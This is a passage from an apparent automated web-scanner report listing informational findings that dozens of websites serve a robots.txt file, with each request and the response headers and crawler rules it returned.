Last-Modified: Thu, 09 Sep 2010 06:18:26 GMT
Accept-Ranges: bytes
ETag: "c0250d0e64fcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:27:48 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


30.353. http://www.playmobilusa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.playmobilusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playmobilusa.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:33 GMT
Server: Apache
Last-Modified: Mon, 16 Aug 2010 06:57:21 GMT
ETag: "3e0a-a4-580e3640"
Accept-Ranges: bytes
Content-Length: 164
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-Agent: *
Disallow: /
Allow: /index.html
Allow: /sitemap_com.xml
Allow: /MICROSITES/
Allow: /MICROSITES/TOPAGENTS/DE
Allow: /GREEK/
Sitemap: /sitemap_com.xml



30.354. http://www.plccenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plccenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plccenter.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:06:13 GMT
Connection: close
Content-Length: 1871

#control which bots crawl the site
#copy this file to root folder of web site

User-agent: adidxbot
Crawl-delay: 10
Disallow: /Cart
Disallow: /Cart/
Disallow: /Content/
Disallow: /Scripts/
Di
...[SNIP]...

30.355. http://www.plosone.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.plosone.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.plosone.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:15 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=2F605AA2C4AFF4A83287170B085EEF11.ambra02; Path=/; HttpOnly
ETag: W/"512-1303955986000"
Last-Modified: Thu, 28 Apr 2011 01:59:46 GMT
Content-Length: 512
Cache-Control: max-age=86400
Expires: Mon, 02 May 2011 23:45:15 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-95144505=9514450c:0; path=/

User-agent: 008
Disallow: /

User-agent: *
Crawl-delay: 30
Disallow: /admin/
Disallow: /annotation/secure/
Disallow: /article/emailArticle.action
Disallow: /article/feed/
Disallow: /article/fetchObjec
...[SNIP]...

30.356. http://www.popdose.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popdose.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popdose.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:24:33 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://popdose.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Content-Type: text/plain; charset=utf-8
Content-Length: 24
Vary: User-Agent
Vary: Accept-Encoding

User-agent: *
Disallow:

30.357. http://www.popular-wedding-songs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popular-wedding-songs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popular-wedding-songs.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:41 GMT
Server: Apache/2.2.2 (Unix) PHP/5.1.4
Last-Modified: Tue, 27 Sep 2005 12:01:19 GMT
ETag: "d1409-59-a23b01c0"
Accept-Ranges: bytes
Content-Length: 89
Connection: close
Content-Type: text/plain

User-Agent: Googlebot-Image
Disallow: /

User-agent: Mediapartners-Google*
Disallow:



30.358. http://www.ppld.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ppld.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ppld.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:13 GMT
Server: Apache/2.2.6 (Win32) mod_aspdotnet/2.2 PHP/5.2.6
Last-Modified: Wed, 10 Dec 2008 19:12:20 GMT
ETag: "16c6d-673-9ff4d00"
Accept-Ranges: bytes
Content-Length: 1651
Vary: Accept-Encoding,User-Agent
X-Powered-By: ASP.NET
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

30.359. http://www.pregnancyguideonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pregnancyguideonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pregnancyguideonline.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:09:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 10 Apr 2008 19:58:32 GMT
ETag: "2c4831c-8f-3df12a00"
Accept-Ranges: bytes
Content-Length: 143
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /ip/
Disallow: /bin/
Disallow: /log/
User-agent: Googlebot-Image
Disallow: /



30.360. http://www.prontotech.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prontotech.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prontotech.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:06 GMT
Server: Apache/2.2.4 (Fedora)
ETag: W/"239-1254341704000"
Last-Modified: Wed, 30 Sep 2009 20:15:04 GMT
Content-Length: 239
Content-Type: text/plain;charset=UTF-8
Set-Cookie: JSESSIONID=1333CCEE7F85DBC9F8F4DF047EF2FA44; Path=/
Set-Cookie: SESSIONID=465326773; Path=/
Set-Cookie: abt=ProntoV3_5_9-1.199-cellNum_2; Expires=Tue, 31-May-2011 23:29:06 GMT; Path=/
Set-Cookie: M_ID=3cc77942-12fadc77c81-6cc7; Expires=Tue, 30-Apr-2013 23:29:06 GMT; Path=/
Set-Cookie: V_ID=3cc77942-12fadc77c81-6cc8; Path=/
_eep-Alive: timeout=15
_onnection: Keep-Alive
Via: CN-5000
Connection: close

User-agent: Sosospider
Disallow: /

User-agent: *
Disallow: /user/
Disallow: /client/
Disallow: /account/
Disallow: /images/
Disallow: /js/
Disallow: /css-global/
Disallow: /css-local/

Sitemap: http:
...[SNIP]...

30.361. http://www.ptla.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ptla.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ptla.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.6 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 15 Mar 2011 20:24:39 GMT
ETag: "3868066-673-49e8b37b38fc0"
Accept-Ranges: bytes
Content-Length: 1651
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:38:27 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

30.362. http://www.pumpkinlabs.com/ads/ad-geo-contextual.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pumpkinlabs.com
Path:   /ads/ad-geo-contextual.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pumpkinlabs.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=b5n3bbqk5mr16uum9r2n3iai30; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.pumpkinlabs.com/xmlrpc.php
Content-Length: 76
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.pumpkinlabs.com/sitemap.xml.gz

30.363. http://www.qbike.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qbike.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qbike.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:20 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.11 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 12 Jan 2011 05:18:15 GMT
Accept-Ranges: bytes
Content-Length: 882
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.qbike.com/

User-agent: *
Disallow: /cgi-bin/item.cgi
Disallow: /cgi-bin/site.cgi
Disallow: /cgi-bin/ebay.cgi
Disallow: /cgi-bin/goto.cgi
Disallow: /cgi-bin/other.cgi
Disal
...[SNIP]...

30.364. http://www.questcomp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcomp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.questcomp.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=21600
Content-Length: 924
Content-Type: text/plain
Last-Modified: Mon, 20 Apr 2009 15:06:51 GMT
Accept-Ranges: bytes
ETag: "5dd8ca2c9c1c91:14b8"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:32 GMT
Connection: close

# in webrfq, only files allowed are Featuredparts, QuestDetailsAll and ZQuestDetails
User-agent: *
Disallow: /Ajax/
Disallow: /App_Themes/
Disallow: /Archive/
Disallow: /aspnet_client/
Disallow:
...[SNIP]...

30.365. http://www.quiltingboard.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quiltingboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quiltingboard.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:37 GMT
Set-Cookie: JSESSIONID=5CDCE678359BDCE34D253936C6FA07CB; Path=/
Accept-Ranges: bytes
ETag: W/"1506-1291748018000"
Last-Modified: Tue, 07 Dec 2010 18:53:38 GMT
Content-Type: text/plain
Content-Length: 1506
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Connection: close
Set-Cookie: BIGipServerquiltingboard_POOL=1390678188.20480.0000; path=/
Vary: Accept-Encoding

User-agent: Mediapartners-Google
Disallow:

User-agent: Googlebot
User-agent: Googlebot-Image
User-agent: Adsbot-Google
User-agent: msnbot
User-agent: Slurp
User-agent: Yahoo-MMCrawler
User-agent: Teo
...[SNIP]...

30.366. http://www.quizrocket.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quizrocket.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quizrocket.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:04:51 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi TELi OUR DELi SAMi STP IND PHY ONL UNI DEM PRE"
Status: 200
X-Quazar: ec2-184-73-63-134
Content-Length: 384
X-Varnish: 768506486
Via: 1.1 varnish
Cache-Control: max-age=3600, proxy-revalidate
Age: 0
X-Cache: MISS
X-QuazarCache: production_a

User-Agent: *
Disallow: /*gatherer_id*
Disallow: /challenge
Disallow: /results
Disallow: /block_postal
Disallow: /unsubscribe
Disallow: /privacy
Disallow: /*/n/
Disallow: /*q_result*
Disallow: /aladdi
...[SNIP]...

30.367. http://www.rappahannock.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rappahannock.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rappahannock.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:09 GMT
Server: Apache
Last-Modified: Mon, 03 Jan 2011 17:31:54 GMT
Accept-Ranges: bytes
Content-Length: 173
Cache-Control: max-age=86400
Expires: Tue, 03 May 2011 00:05:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

Sitemap: http://www.rappahannock.edu/sitemap.xml

30.368. http://www.rc-airplane-world.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rc-airplane-world.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rc-airplane-world.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:53:13 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.rc-airplane-world.com/r5FdlQz6.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dy
...[SNIP]...

30.369. http://www.redcounty.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcounty.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcounty.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:11 GMT
Server: Apache/2.2.17
Last-Modified: Wed, 02 Mar 2011 16:27:20 GMT
ETag: "636-49d82630dca00"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:05:11 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.370. http://www.reelseo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reelseo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reelseo.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:59 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 03:52:57 GMT
ETag: "3f5-49c5e3763f840"
Accept-Ranges: bytes
Content-Length: 1013
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Mon, 02 May 2011 01:37:59 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /feed/podcast/
Allow: /wp-content/uploads/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /feed/
Disallow: /trackback/
Disallow: /forms/
Disallow: /
...[SNIP]...

30.371. http://www.rezstreamsynch.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rezstreamsynch.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rezstreamsynch.net

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 06 Oct 2009 22:04:08 GMT
Accept-Ranges: bytes
ETag: "a0a156edd046ca1:468"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:56:04 GMT
Connection: close

User-agent: *
Disallow: /

30.372. http://www.riu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.riu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.riu.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:45:33 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Wed, 27 Apr 2011 15:22:12 GMT
ETag: "2b45c0-84-4a1e8013b7100"
Accept-Ranges: bytes
Content-Length: 132
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# riu.com robots.txt
# lastmods 27.04.2011

User-agent: *
Disallow: /?*
Disallow: /*.jsp?*

Sitemap: http://www.riu.com/sitemap.xml

30.373. http://www.rnbxclusive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rnbxclusive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rnbxclusive.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:02:42 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=433adaccc282583342ab18a968cc1e59; path=/
X-Pingback: http://rnbxclusive.com/xmlrpc.php
Content-Length: 72
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://rnbxclusive.com/sitemap.xml.gz

30.374. http://www.ronnies.com/micro.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronnies.com
Path:   /micro.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ronnies.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25
Content-Type: text/plain
Cache-control: private

User-agent: *
Allow: /

30.375. http://www.ronniesmailorder.com/fiche_select.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ronniesmailorder.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 02:30:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25
Content-Type: text/plain
Cache-control: private

User-agent: *
Allow: /

30.376. http://www.rtsports.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtsports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rtsports.com

Response

HTTP/1.0 200 OK
Date: Fri, 29 Apr 2011 22:42:35 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 12 May 2009 16:54:36 GMT
ETag: "b92720-46-469b9f3250b00"
Accept-Ranges: bytes
Content-Length: 70
Vary: Accept-Encoding
Content-Type: text/plain
Age: 179116
X-Cache: HIT from tarkenton2.rtsports.com
X-Cache-Lookup: HIT from tarkenton2.rtsports.com:80
Via: 1.1 tarkenton2.rtsports.com:80 (squid/2.7.STABLE3)
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.rtsports.com/sitemap.xml

30.377. http://www.ryder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ryder.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ryder.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 02 May 2011 00:12:07 GMT
Content-length: 82
Content-type: text/plain
Last-modified: Fri, 08 Oct 2010 13:18:38 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /content/
Disallow: /pdf/
Disallow: /xml/
Allow: /


30.378. http://www.s10forum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.s10forum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.s10forum.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:14 GMT
Server: Apache
Last-Modified: Tue, 01 May 2007 23:49:21 GMT
Accept-Ranges: bytes
Content-Length: 1094
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: Slurp
Crawl-delay: 60
User-agent: Mediapartners-Google*
User-agent: *
Disallow: /forum/vbseo_sitemap
Disallow: /forum/admincp
Disallow: /forum/attachments
Disallow: /forum/attachment.php
D
...[SNIP]...

30.379. http://www.sailboatlistings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sailboatlistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sailboatlistings.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:00 GMT
Server: Apache
Last-Modified: Sat, 16 Oct 2010 22:32:02 GMT
Accept-Ranges: bytes
Content-Length: 59
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /report-abuse/

30.380. http://www.schnucks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schnucks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schnucks.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:09 GMT
Server: Apache
Last-Modified: Wed, 27 Oct 2010 13:19:39 GMT
ETag: "17-4939913d750c0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

30.381. http://www.schoolsk-12.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.schoolsk-12.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.schoolsk-12.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:38 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Fri, 23 Jul 2010 14:30:14 GMT
ETag: "100000001ba54-21-48c0edf81a2fd"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/


30.382. http://www.sdge.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sdge.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:48 GMT
Server: Apache
Last-Modified: Mon, 12 Apr 2010 20:44:22 GMT
ETag: "94-4841035b15580"
Accept-Ranges: bytes
Content-Length: 148
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /images/
Disallow: /email/
Disallow: /media/
Disallow: /sandbox/
Disallow: /vendor/
Disallow: /includes/


30.383. http://www.seiu.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seiu.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seiu.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:32 GMT
Server: Apache
Last-Modified: Tue, 07 Oct 2008 16:03:41 GMT
ETag: "500b1-51-458abf17d1140"
Accept-Ranges: bytes
Content-Length: 81
Vary: Accept-Encoding
Web-Head: vps107.advomatic.com
Connection: close
Content-Type: text/plain

Sitemap: http://www.seiu.org/sitemap.xml
User-agent: Googlebot
Disallow: /*.cfm$

30.384. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.seoq.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 02:12:54 GMT
Server: Apache
Set-Cookie: PHPSESSID=cv7iirbdja1lpi5ipdaaln5e50; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

30.385. http://www.shareup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shareup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shareup.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:29 GMT
Server: Apache
Last-Modified: Fri, 12 Oct 2007 16:52:59 GMT
ETag: "17810b7-625-8d1630c0"
Accept-Ranges: bytes
Content-Length: 1573
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /search.php
Disallow: /devhome.php
Disallow: /getfile.php
Disallow: /buy-now.php
Disallow: /buynow.php
User-agent: DigOut4U
Disallo
...[SNIP]...

30.386. http://www.sheddaquarium.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheddaquarium.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sheddaquarium.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:05:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 22 Jan 2010 21:13:14 GMT
ETag: "580263-6c-499f8e80"
Accept-Ranges: bytes
Content-Length: 108
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /old_pdf/
Disallow: /old_flash/
Disallow: /old_images/
Disallow: /old_html/
Allow: /

30.387. http://www.shoppingsage.info/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoppingsage.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.shoppingsage.info

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 07 Apr 2010 21:01:44 GMT
ETag: "748c6-1a-483abde981e00"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

user-agent: *
Disallow: /

30.388. http://www.slotocash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slotocash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slotocash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:37 GMT
Server: Apache
Last-Modified: Fri, 11 Apr 2008 10:24:40 GMT
Accept-Ranges: bytes
Content-Length: 53
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /lp/
Disallow: /includes/

30.389. http://www.smoker-cooking.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smoker-cooking.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smoker-cooking.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:01:04 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.smoker-cooking.com/7Wi62WEv.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/

...[SNIP]...

30.390. http://www.snapdealz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapdealz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snapdealz.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:10 GMT
Server: Apache/2.2.17
Last-Modified: Tue, 02 Jun 2009 05:29:10 GMT
